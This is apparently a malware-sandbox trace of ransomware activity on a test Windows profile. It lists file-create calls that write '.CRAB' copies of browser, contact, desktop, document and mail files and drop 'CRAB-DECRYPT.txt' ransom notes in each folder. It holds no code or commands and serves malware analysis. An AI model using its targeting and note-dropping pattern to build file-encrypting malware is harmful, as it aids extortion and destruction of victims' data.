Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\weave\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\weave\changes\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\weave\failed\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\weave\toFetch\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\m_nGah.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\N8kyOxBZYqA.pptx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\nxRTCA.png.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\pZhCOkJZpzNkmoN1.xls.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\QFjjDT.swf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\rkI K.ots.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Skype\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Skype\RootTools\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Skype\RootTools\roottools.conf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\SmmEt-LdVr0Zx_Olc3.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\t77nCyK2D54L-.avi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\TAUFKXR.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\vIAk3uQVE mqJmgqmrn.ods.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Vq88gNsu_kGKzVaZAN.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\wdCIUyDrDQiTXy79Virc.odt.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\xG4x4HeiKjZ7Vc.png.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\XPHiF.mkv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\YdDv7baHmkIEK.odp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\zx8we.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\aETAdzjz\Contacts\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Contacts\Aclviho ASldjfl.contact.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Contacts\Administrator.contact.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Contacts\asdlfk poopvy.contact.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Contacts\chucu jadnvk.contact.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Contacts\lulcit amkdfe.contact.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Contacts\sikvnb huvuib.contact.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Cookies\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Desktop\3A80h.avi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\4 1LtDyY FBJawFQ.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\4QM07F6yi6WlHQO.avi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\4Y6Y7jsM.png.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\6ht1YAcPawDjrvm.mp4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\6WhIjpj4XFj DHxr\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Desktop\6WhIjpj4XFj DHxr\7WldkHXQxOVpDQNDW.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\6WhIjpj4XFj DHxr\awF3QaYYKE7JiHzZbi_.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\6WhIjpj4XFj DHxr\EMGs.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\6WhIjpj4XFj DHxr\jOCFd3U8H5x-sRV.png.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\6WhIjpj4XFj DHxr\Lg_E8OT886.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\6WhIjpj4XFj DHxr\QGDstYULo.mp4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\6WhIjpj4XFj DHxr\RA2oHeB2ZaZIGBVr.mkv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\8PhOMHQyq Tz.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\8srMDU-1UEo4QvDtImh.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\BERtbjZoGk-pmD-oM.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\bWy_MRp2om1.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\D2f1tj.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\dAKG0TLKDH61.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\dhl_invoice_18553.doc.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\eUfR3lQa.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\FktU4DvV6MVn2KxwF.pdf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\G8Tyx3zLajrPPMN.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\gkp2rD84ZW7zF1NxOV.avi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\JShk.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\k6C2ik2VsqwNdkpBGLiQ.swf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\k7ArAafxQ3.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\lisuiJsd.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\lu9c.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\MI006H9reLw-c1Mvt_.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\mQZl8_BRS-zJu.ots.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\nnEqLRC4CW2k0D4StTxD.csv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\o1QtvmgIu_5m-c.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\OKEnkR.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\pu66BoBBusrt_.ppt.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\QBJ aWsjl5XuOmTR.odt.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\rwwB_IyMvSFBdceY.xlsx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\TXWXJ1dTwCLcU6GYj.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\VIGUMaaKsm.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\xua-sokoX-vsS y6.swf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Desktop\~$l_invoice_18553.doc.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Documents\-Gh8xVTHvKN.docx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\cEK7diml1yk6u.xlsx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\Database1.accdb.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\EpiSwZrXkY6iDl6--5.xlsx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\GfH8PzIxmf.doc.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\HtPTql011UKU.xlsx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\hZA-Nxcz-sO5.docx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\I8taZ.xls.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\Ieey.xlsx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\ImM0lH0iiw- Rdf3.xlsx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\k1KOs_f.docx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\MgrkE0wLUFsS9w.pptx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\mUX5K0uVoGwK.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Documents\My Shapes\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Documents\My Shapes\_private\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Documents\OneNote Notebooks\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Documents\OneNote Notebooks\My Notebook\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Documents\OneNote Notebooks\My Notebook\Open Notebook.onetoc2.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\OneNote Notebooks\My Notebook\Quick Notes.one.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\Outlook Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Documents\Outlook Files\sdjwh@dive.djh.pst.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\QXRvGRN2b-34jO0VFfJP.ppt.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\SavSU.docx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\7 e5Hi.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\DyZA.odp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\hWPRwg1\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\hWPRwg1\3OWcZ.xls.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\hWPRwg1\3wyy3mPSQv_eyS.xls.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\hWPRwg1\9hgy.odt.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\hWPRwg1\JvPde-zjB.ods.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\hWPRwg1\KLdGRkhuNU3Axy.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\hWPRwg1\M5kzrLO8.pptx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\izrm4fve.odt.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\OpNt-Qn4ao6jyD.csv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
